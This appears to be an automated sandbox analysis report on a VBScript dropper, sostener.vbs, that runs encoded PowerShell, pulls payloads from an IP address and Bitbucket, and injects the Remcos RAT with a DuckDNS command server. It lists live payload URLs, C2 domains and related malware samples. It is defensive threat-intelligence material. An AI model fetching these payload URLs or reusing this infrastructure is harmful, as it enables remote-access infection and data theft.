                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium
                  Impact: System Shutdown/Reboot (1); Defacement (1); Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  Behavior Graph ID: 1559185, Sample: sostener.vbs, Start date: 20/11/2024, Architecture: WINDOWS, Score: 100

                  sostener.vbs (sample)
                  • DNS/IP: remcosnov24.duckdns.org; s3-w.us-east-1.amazonaws.com; 4 other IPs or domains
                  • Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 15 other signatures
                  • Started: wscript.exe

                  remcosnov24.duckdns.org
                  • Signatures: Uses dynamic DNS services

                  wscript.exe
                  • Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
                  • Started: powershell.exe

                  powershell.exe (started by wscript.exe)
                  • Signatures: Suspicious powershell command line found; Encrypted powershell cmdline option found; Uses ping.exe to check the status of other devices and networks; Found suspicious powershell code related to unpacking or dynamic code loading
                  • Started: powershell.exe; conhost.exe

                  powershell.exe (second stage)
                  • DNS/IP: 91.202.233.169 (ports 49699, 49726, 80; M247GB, Russian Federation); bitbucket.org 185.166.143.49 (ports 443, 49737; AMAZON-02US, Germany); s3-w.us-east-1.amazonaws.com 52.217.196.57 (ports 443, 49747; AMAZON-02US, United States)
                  • Signatures: Encrypted powershell cmdline option found; Writes to foreign memory regions; Potential dropper URLs found in powershell memory; Injects a PE file into a foreign processes
                  • Started: AddInProcess32.exe; PING.EXE; powershell.exe; cmd.exe

                  AddInProcess32.exe
                  • DNS/IP: remcosnov24.duckdns.org 190.9.223.135 (ports 4576, 49759; EPMTelecomunicacionesSAESPCO, Colombia); geoplugin.net 178.237.33.50 (ports 49769, 80; ATOM86-ASATOM86NL, Netherlands)
                  • Dropped: C:\ProgramData\remcos\registros.dat (data)
                  • Signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionality to change the wallpaper; 5 other signatures

                  PING.EXE
                  • DNS/IP: 127.0.0.1 (unknown, unknown)

                  Antivirus results (Source | Detection | Scanner | Label)
                  sostener.vbs | 21% | ReversingLabs | Win32.Trojan.Honolulu
                  No Antivirus matches
                  URL scan results (Source | Detection | Scanner | Label)
                  http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AC/Pef3.txt | 100% | Avira URL Cloud | malware
                  http://91.202.233.169 | 0% | Avira URL Cloud | safe
                  http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt | 100% | Avira URL Cloud | malware
                  http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/A | 0% | Avira URL Cloud | safe
                  remcosnov24.duckdns.org | 0% | Avira URL Cloud | safe
                  https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net | 0% | Avira URL Cloud | safe
                  http://crl.veris | 0% | Avira URL Cloud | safe
                  https://bbuseruploads.s3.amazohj6 | 0% | Avira URL Cloud | safe
                  http://91.202.H | 0% | Avira URL Cloud | safe
                  http://91.202. | 0% | Avira URL Cloud | safe
                  https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net | 0% | Avira URL Cloud | safe
                  Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
                  s3-w.us-east-1.amazonaws.com | 52.217.196.57 | true | false | - | high
                  bitbucket.org | 185.166.143.49 | true | false | - | high
                  geoplugin.net | 178.237.33.50 | true | false | - | high
                  remcosnov24.duckdns.org | 190.9.223.135 | true | true | - | unknown
                  bbuseruploads.s3.amazonaws.com | unknown | unknown | false | - | high
                  Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
                  http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AC/Pef3.txt | true | Avira URL Cloud: malware | unknown
                  remcosnov24.duckdns.org | true | Avira URL Cloud: safe | unknown
                  http://geoplugin.net/json.gp | false | - | high
                  http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt | true | Avira URL Cloud: malware | unknown
                  https://bitbucket.org/hector4576--/noviembre19/downloads/sos19nov.txt | false | - | high
                  URLs from memory and binaries (Name | Source | Malicious | Antivirus Detection | Reputation)
                  http://nuget.org/NuGet.exe | powershell.exe, 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F11E38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1373918756.0000026C410EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1356648553.0000026C32A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                  http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 0000000D.00000002.1356648553.0000026C32531000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                  https://bbuseruploads.s3.amazonaws.com | powershell.exe, 00000007.00000002.1428025398.0000025F10906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                  https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net | powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
                  http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000D.00000002.1356648553.0000026C328FE000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                  http://geoplugin.net/json.gpl | AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                  http://geoplugin.net/json.gpk | AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                  http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000D.00000002.1356648553.0000026C328FE000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                  https://go.micro | powershell.exe, 00000007.00000002.1428025398.0000025F1153A000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                  https://bbuseruploads.s3.amazohj6 | powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  http://bitbucket.org | powershell.exe, 00000007.00000002.1428025398.0000025F10A72000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                  https://web-security-reports.services.atlassian.com/csp-report/bb-website | powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                  https://contoso.com/License | powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                  http://91.202.233.169 | powershell.exe, 00000007.00000002.1428025398.0000025F109FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F1153A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10603000.00000004.00000800.00020000.00000000.sdmp | true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://contoso.com/Iconpowershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/Apowershell.exe, 00000007.00000002.1428025398.0000025F109FD000.00000004.00000800.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netpowershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://dz8aopenkvv6s.cloudfront.netpowershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.1356648553.0000026C328FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://geoplugin.net/json.gpSystem32AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://bbuseruploads.s3.amazonaws.com/ed63b646-30bf-4545-bacd-1a1d263f75fb/downloads/6d9f1851-1729-powershell.exe, 00000007.00000002.1428025398.0000025F10906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://bitbucket.org/hector4576--/noviembre19/downloads/sospowershell.exe, 00000007.00000002.1428025398.0000025F10A6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://geoplugin.net/json.gp/Cpowershell.exe, 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://remote-app-switcher.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://crl.verispowershell.exe, 00000007.00000002.1515951705.0000025F28EB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmptrue
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://91.202.Hpowershell.exe, 00000007.00000002.1428025398.0000025F109FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://cdn.cookielaw.org/powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://contoso.com/powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F11E38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1373918756.0000026C410EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1356648553.0000026C32A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://91.202.powershell.exe, 00000007.00000002.1428025398.0000025F1153A000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://oneget.orgXpowershell.exe, 0000000D.00000002.1356648553.0000026C32531000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://aui-cdn.atlassian.com/powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://remote-app-switcher.stg-east.frontend.public.atl-paas.netpowershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://aka.ms/pscore68powershell.exe, 00000002.00000002.1540300511.0000022615AB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1540300511.0000022615A9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F103E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1356648553.0000026C31071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://s3-w.us-east-1.amazonaws.compowershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1540300511.0000022615AE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F103E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1356648553.0000026C31071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://bitbucket.orgpowershell.exe, 00000007.00000002.1428025398.0000025F10603000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://bbuseruploads.s3.amazonaws.compowershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://oneget.orgpowershell.exe, 0000000D.00000002.1356648553.0000026C32531000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
IP               Domain                          Country             ASN     ASN Name                        Malicious
91.202.233.169   unknown                         Russian Federation  9009    M247GB                          true
185.166.143.49   bitbucket.org                   Germany             16509   AMAZON-02US                     false
190.9.223.135    remcosnov24.duckdns.org         Colombia            13489   EPMTelecomunicacionesSAESPCO    true
178.237.33.50    geoplugin.net                   Netherlands         8455    ATOM86-ASATOM86NL               false
52.217.196.57    s3-w.us-east-1.amazonaws.com    United States       16509   AMAZON-02US                     false

IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1559185
Start date and time: 2024-11-20 09:35:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 32s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: sostener.vbs
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winVBS@14/11@5/6
EGA Information:
• Successful, ratio: 25%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 56
• Number of non-executed functions: 179
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 5896 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7104 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7396 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: sostener.vbs
Time       Type              Description
03:36:08   API Interceptor   44x Sleep call for process: powershell.exe modified
04:58:28   API Interceptor   1685716x Sleep call for process: AddInProcess32.exe modified
Associated samples by matched IP (per associated sample: Sample Name / URL | Detection | Threat Name; the shared indicator from that sample's context is listed beneath it)

Match: 91.202.233.169
  sostener.vbs | malicious | AsyncRAT, DcRat
  • 91.202.233.169/Tak/Reg/Marz/ENVS/DJ1.txt
  sostener.vbs | malicious | AsyncRAT, DcRat
  • 91.202.233.169/Tak/Reg/Marz/ENVS/DJ1.txt
  sostener.vbs | malicious | AsyncRAT, DcRat
  • 91.202.233.169/Tak/Reg/Marz/ENVS/DS1.txt
  sostener.vbs | malicious | Remcos
  • 91.202.233.169/Tak/Reg/Marz/SH/Rcm.txt
  sostener.vbs | malicious | Remcos
  • 91.202.233.169/Tak/Reg/Marz/ZQWER/PeF3Dir.txt
  envifa.vbs | malicious | Remcos
  • 91.202.233.169/Tak/Reg/Marz/ZQWER/PeF3Dir.txt

Match: 185.166.143.49
  http://jasonj002.bitbucket.io/ | malicious | HTMLPhisher
  • jasonj002.bitbucket.io/

Match: 190.9.223.135
  17296647938df51b488a4b10af039d00bfb27fe3a436cd4ff424d14b629b0e40b425fe2a13526.dat-decoded.exe | malicious | Remcos

Associated samples by matched domain (same layout: Sample Name / URL | Detection | Threat Name, shared indicator beneath)

Match: s3-w.us-east-1.amazonaws.com
  900092839283982.exe | malicious | DBatLoader, VIP Keylogger
  • 52.216.214.9
  https://www.zealxllc.com/sgv | malicious | Unknown
  • 3.5.12.15
  S0FTWARE.exe | malicious | Stealc, Vidar
  • 3.5.30.241
  https://desertgarprodentalbdenmontessori.sharefile.com/public/share/web-sc0171e76f26940ab83813f90c639bcc9 | malicious | Unknown
  • 52.216.105.187
  https://bbva-es.ayuda-acceso.com | malicious | Unknown
  • 52.217.132.225
  https://phisher-parts-production-us-east-1.s3.amazonaws.com/da08a569-c476-4c06-9e6f-9e3c8ae51232/2024-11-13/am8ltkc1mbphloeu0ibap1mm0rjkho1b9lmvvg81/0a2d8971d2f23f8064ed6608cfd357fab0fafbbe0783e460016281e5880a6058?response-content-disposition=attachment%3B%20filename%3D%22original.eml%22%3B%20filename%2A%3DUTF-8%27%27original.eml&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIA37KREM2QKNAIBCYB%2F20241113%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241113T195010Z&X-Amz-Expires=1295&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEE8aCXVzLWVhc3QtMSJHMEUCIQDes66x%2BvCQrbr4JurBlxh%2FZwoDTCni9uTYWg1yMkw8tgIgTothHdz21wvRLJB%2FyapL2pjSpo6sjfetIsM92xQR7jIqiAQI1%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw4MjMxOTMyNjU4MjQiDABFVf2%2FdFyB4YBlASrcA1V97UHXoaECeX9WNhXaJ66QhShDmzG2%2BnhXoBnvJ9MSZ3FxSKxy2N312vfT0jX%2BE5TYr%2BvMrecn2z2sXImebnwKpWaSE2k3Jnib62DSuxBl%2BPamZXxx2Zqf0KK0B7I5NnPzVFnq7x986hPj38NgaIpxiSisb1KjZdQD4CafHD6wov5qR1J%2BWFsQZpv1lVIX9hrrZbd2TckXngnmqqbL3933Cu9uR2d6fi4Fa%2BodSVQhlyJUJ1fZQ6f7T3JgDGQ1noG0bjKDC268COJJSzXJF5Dk7lpHgMlqYeQ70Hmo3RSB0r6VEbQ1Pbg033wDv8Z%2Bdrm6s8FQuaEdh9ChgB5rug5qXSxc1RTtjRvLnojXQoXRMoGmKYUj%2FduDkSPDQNFR5cHODQjiZFT9IWFxoHk8XJBZXRmTQwiB2TpVzclYAuXORIl9MkLYPp120X6S%2FgCfUlAWZS3Hz9Im%2FhkcTYOiIlUyWPMSReAlGbzLfoT9ND4RJ6usv9EucqIl88Fwkd0ijQf4D3FNYUy2%2BoCu5rSsBMF9rsGkiFUWudPGgjhet3mjcjym4mGGOwYX11H2Pglw%2FABHybbWlRc2CuBjINcCEt0TFuHqO1J2mnw8fpUjMpEwW6o1FShICEc3rDA%2BMKHn0rkGOqUB4xGwEdpTafHkFGGqxzPNpkDcZfnnaU%2FAbOCkGXpyMUhW517qD4FJAmQp%2Bfnl96Tnibf8swoM4SIisjl2jnb%2FU0kq%2BmrN6TFSuMgCgTVQQHcK3ExoKVHLZjrL6%2Bhxh1TzP%2Bpf9ubLwUBMdlqYEKa7N2RQt4hz7n1zW4y%2BMIQEX1vvQuzUBZyYp1XE4j2LT8EAeuznKfcLOqeqoRaUMVe2ofiZ55vf&X-Amz-SignedHeaders=host&X-Amz-Signature=ccc669f52c34a8e1dc4626cae26b2cda7c06245991a7c2f0f6ae3366ae332565 | malicious | Unknown
  • 16.182.64.113
  https://webconference.protected-forms.com/XZmlBeUlkbExkNHYxS3piZldoaGJqTzUrV3RZK1BkOGZVMlRsRGFZcnlYbnJ1K3h1VjJEMnY1d0lXNFNQVmswcXFCTmFqczEyaHMyc3lwSUpvNnFFYlJLemVwaEpGbjRXVnVRRk93ZUxYY0dwRmhsZ010WmVrNTNVR0N0YkdCeTRnTHZMb043aXdiVFo5a25TNjZkVThLaW8wem41RTU3MUl5b2dxWjNpdjFLNWdRSmdxL2ZocGVvdDVBPT0tLVNLdmlEU1hLTGZIRW9VQ0YtLWFoQVVsMnk3VVFLbzBPZHpycUt6OEE9PQ==?cid=2178924675 | malicious | KnowBe4
  • 3.5.29.160
  http://software.oldversion.com/download.php?f=YTo1OntzOjQ6InRpbWUiO2k6MTczMTQ4OTAwMjtzOjI6ImlkIjtpOjEzODk4O3M6NDoiZmlsZSI7czo0MzoicGRmY3JlYXRvci0xLTYtMi1QREZDcmVhdG9yLTFfNl8yX3NldHVwLmV4ZSI7czozOiJ1cmwiO3M6NTA6Imh0dHA6Ly93d3cub2xkdmVyc2lvbi5jb20vd2luZG93cy9wZGZjcmVhdG9yLTEtNi0yIjtzOjQ6InBhc3MiO3M6MzI6IjMwYzExNzY3MTEwNWY3MjhjYjA0YzU2ZjkzYTc1YTRjIjt9 | malicious | Unknown
  • 3.5.29.148
  https://temp.farenheit.net/XNmRkL0JpUmxBQTZuV2tIZUROa0lqeFhjbUlHS1FUR2d2YjZVKzQrNmxLeGxNOWRBLzMrc0pQRERZejVvZTA2ZENOTU5qV1hoaG1oL2JqQit5cE9DdEs1OS9NbVRVQUlObzNpVFlGMmZDT2lrWUVmeGVHNHU4REdtb04vME5iTDZBbVZ5cVc3ZXRxVnE1YkE0eWd3Z3RFVFYvWXh2OHJGRTVOaTJ5b0pPVEpsNDhXZnM5M1B2S3RPYU54MjZCRENPdjJ5bGl6bmxDc3IvOW1Ub3JsaXpaTWRsU0FlcU1pU2NzbzdrcXc9PS0tRTRqMzk0TUpka2xBNHo0Wi0tMTBZdXRlVmpmTWI1WnVlQkhpazZ1dz09?cid=2268024181 | malicious | KnowBe4
  • 52.217.68.44
  Selected_Items.vbs | malicious | FormBook
  • 54.231.138.185

Match: bitbucket.org
  900092839283982.exe | malicious | DBatLoader, VIP Keylogger
  • 185.166.143.49
  0a0#U00a0.js | malicious | RHADAMANTHYS
  • 185.166.143.50
  m2.exe | malicious | Xmrig
  • 185.166.143.49
  S0FTWARE.exe | malicious | Stealc, Vidar
  • 185.166.143.49
  Selected_Items.vbs | malicious | FormBook
  • 185.166.143.50
  90876654545.exe | malicious | DBatLoader, FormBook
  • 185.166.143.50
  Purchase_order08112024_pdf.vbs | malicious | Unknown
  • 185.166.143.48
  asegurar.vbs | malicious | Remcos
  • 185.166.143.48
  FmmYUD4pt7.wsf | malicious | Unknown
                                                                                                      • 185.166.143.49
                                                                                                      2tKeEoCCCw.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                      • 185.166.143.50
                                                                                                      geoplugin.net1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 178.237.33.50
                                                                                                      USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                      • 178.237.33.50
                                                                                                      Pago_BBVA.pdf.bat.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 178.237.33.50
                                                                                                      USD470900_COPY_800BLHSBC882001.PDF.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                      • 178.237.33.50
                                                                                                      globe_product_order_korea_buy_20_11_2024_000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                      • 178.237.33.50
                                                                                                      file.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 178.237.33.50
                                                                                                      YYHh9QU804.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 178.237.33.50
                                                                                                      seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                      • 178.237.33.50
                                                                                                      FRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 178.237.33.50
                                                                                                      Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                      • 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
M247GB | http://ok.clicknowvip.com | malicious | Unknown | 38.132.109.126
 | owari.mips.elf | malicious | Unknown | 38.202.251.241
 | ppc.elf | malicious | Unknown | 213.182.204.57
 | hmips.elf | malicious | Unknown | 213.182.204.57
 | file.exe | malicious | NetSupport RAT | 45.61.128.74
 | file.exe | malicious | NetSupport RAT | 45.61.128.74
 | yhYrGCKq9s.exe | malicious | RedLine | 91.202.233.18
 | meerkat.arm.elf | malicious | Mirai | 38.201.237.116
 | botnet.x86.elf | malicious | Mirai, Moobot | 38.207.55.160
 | mips.elf | malicious | Unknown | 213.182.204.57
AMAZON-02US | SWIFT COPY 0028_pdf.exe | malicious | FormBook | 76.223.74.74
 | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 18.245.60.53
 | New Order - RCII900718_Contract Drafting.exe | malicious | FormBook | 13.248.169.48
 | x86-20241120-0553.elf | malicious | Unknown | 34.254.182.186
 | arm7.nn-20241120-0508.elf | malicious | Mirai, Okiru | 3.131.202.239
 | meow.arm7.elf | malicious | Unknown | 44.252.140.153
 | x86_32.nn.elf | malicious | Mirai, Okiru | 18.202.159.69
 | https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2FiO8EME-SUREDANNaW50ZXJtb2RhbC5qYXhAc2VhYm9hcmRtYXJpbmUuY29t | malicious | Unknown | 54.154.143.167
 | mipsel.nn.elf | malicious | Mirai, Okiru | 3.191.65.152
 | need quotations.exe | malicious | FormBook | 13.248.169.48
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | LummaC | 52.217.196.57, 185.166.143.49
 | seethebestthingswithgreatsituationshandletotheprogress.hta | malicious | Cobalt Strike, AgentTesla, HTMLPhisher | 52.217.196.57, 185.166.143.49
 | Quote specification and BOQ.exe | malicious | GuLoader | 52.217.196.57, 185.166.143.49
 | QUOTATION_NOVQTRA071244PDF.scr.exe | malicious | Snake Keylogger | 52.217.196.57, 185.166.143.49
 | file.exe | malicious | LummaC | 52.217.196.57, 185.166.143.49
 | Towered.vbs | malicious | FormBook, GuLoader | 52.217.196.57, 185.166.143.49
 | quote001.vbs | malicious | GuLoader | 52.217.196.57, 185.166.143.49
 | e-dekont_html.exe | malicious | Snake Keylogger, VIP Keylogger | 52.217.196.57, 185.166.143.49
